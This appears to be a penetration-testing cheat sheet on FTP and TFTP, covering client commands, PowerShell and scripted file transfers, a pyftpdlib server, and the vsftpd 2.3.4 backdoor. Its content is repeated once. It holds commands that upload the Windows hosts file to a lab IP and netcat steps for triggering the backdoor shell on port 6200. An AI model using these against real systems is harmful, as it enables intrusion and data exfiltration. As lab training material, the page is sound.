FTP

File Transfer Protocol

Uses Port 20 for Data and Port 21 for Commands.
It can use UDP over Port 69 for TFTP.
Always check for anonymous login being enabled.

Basic Commands

Start the service:

ftp <IP>
tftp <IP>

To login as any other user:

USER <user>

To specify a password:

PASS <password>

Download a file:

get <file>

Upload a file:

put <file_path> <destination_path>

Passive mode:

passive

Change the local directory for downloads:

lcd /home/<your-username>

Exit the session:

quit

Transferring files using powershell:

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

Upload a file using powershell

PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

If anonymous login is enabled, use curl:

curl -O ftp://<server-address>/path/to/file

`TFTP`

Uses binary mode for non-text files:

mode binary

Uses ASCII mode for text files:

mode ascii

To look for files in the TFTP root:

find / -name file.txt

Enumeration

Is always good practice to look for vulnerabilities:

searchsploit <version>

Check where you land:

pwd

List directories:

dir

This is the default config file for TFTP --> tftpd-hpa

`FTP` `Python` Server

First, Install the Python module:

sudo pip3 install pyftpdlib

Then, set the server:

sudo python3 -m pyftpdlib --port 21

By default, pyftpdlib uses Port 2121, anonymous authentication is enabled by default if we don't set a user and password.
Allow users to upload files:

sudo python3 -m pyftpdlib --port 21 --write

Create a command file

Is possible to create command files and execute then using the -s flag:

ftp -v -n -s:ftpcommand.txt

Copy this in to a file to create a script that will download a file:

open 192.168.49.128
USER anonymous
binary
GET file.txt
bye

Copy this in to a file to create a script that will upload a file to the server:

open 192.168.49.128
USER anonymous
binary
PUT c:\windows\system32\drivers\etc\hosts
bye

Vulnerabilities

`vsftpd 2.3.4`

Connect to FTP with any username that contains :), and any password.
Then connect to port 6200 to get a shell:

nc 10.10.10.131 21

Now connect to the backdoor:

nc 10.10.10.131 6200

PreviousDNS NextHTTP/HTTPS

Last updated 2 months ago

FTP

File Transfer Protocol

Uses Port 20 for Data and Port 21 for Commands.
It can use UDP over Port 69 for TFTP.
Always check for anonymous login being enabled.

Basic Commands

Start the service:

ftp <IP>
tftp <IP>

To login as any other user:

USER <user>

To specify a password:

PASS <password>

Download a file:

get <file>

Upload a file:

put <file_path> <destination_path>

Passive mode:

passive

Change the local directory for downloads:

lcd /home/<your-username>

Exit the session:

quit

Transferring files using powershell:

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

Upload a file using powershell

PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

If anonymous login is enabled, use curl:

curl -O ftp://<server-address>/path/to/file

`TFTP`

Uses binary mode for non-text files:

mode binary

Uses ASCII mode for text files:

mode ascii

To look for files in the TFTP root:

find / -name file.txt

Enumeration

Is always good practice to look for vulnerabilities:

searchsploit <version>

Check where you land:

pwd

List directories:

dir

This is the default config file for TFTP --> tftpd-hpa

`FTP` `Python` Server

First, Install the Python module:

sudo pip3 install pyftpdlib

Then, set the server:

sudo python3 -m pyftpdlib --port 21

By default, pyftpdlib uses Port 2121, anonymous authentication is enabled by default if we don't set a user and password.
Allow users to upload files:

sudo python3 -m pyftpdlib --port 21 --write

Create a command file

Is possible to create command files and execute then using the -s flag:

ftp -v -n -s:ftpcommand.txt

Copy this in to a file to create a script that will download a file:

open 192.168.49.128
USER anonymous
binary
GET file.txt
bye

Copy this in to a file to create a script that will upload a file to the server:

open 192.168.49.128
USER anonymous
binary
PUT c:\windows\system32\drivers\etc\hosts
bye

Vulnerabilities

`vsftpd 2.3.4`

Connect to FTP with any username that contains :), and any password.
Then connect to port 6200 to get a shell:

nc 10.10.10.131 21

Now connect to the backdoor:

nc 10.10.10.131 6200

PreviousDNS NextHTTP/HTTPS

Last updated 2 months ago

Basic Commands

TFTP

Enumeration

FTP Python Server

Create a command file

Vulnerabilities

vsftpd 2.3.4

Basic Commands

TFTP

Enumeration

FTP Python Server

Create a command file

Vulnerabilities

vsftpd 2.3.4

`TFTP`

`FTP` `Python` Server

`vsftpd 2.3.4`

`TFTP`

`FTP` `Python` Server

`vsftpd 2.3.4`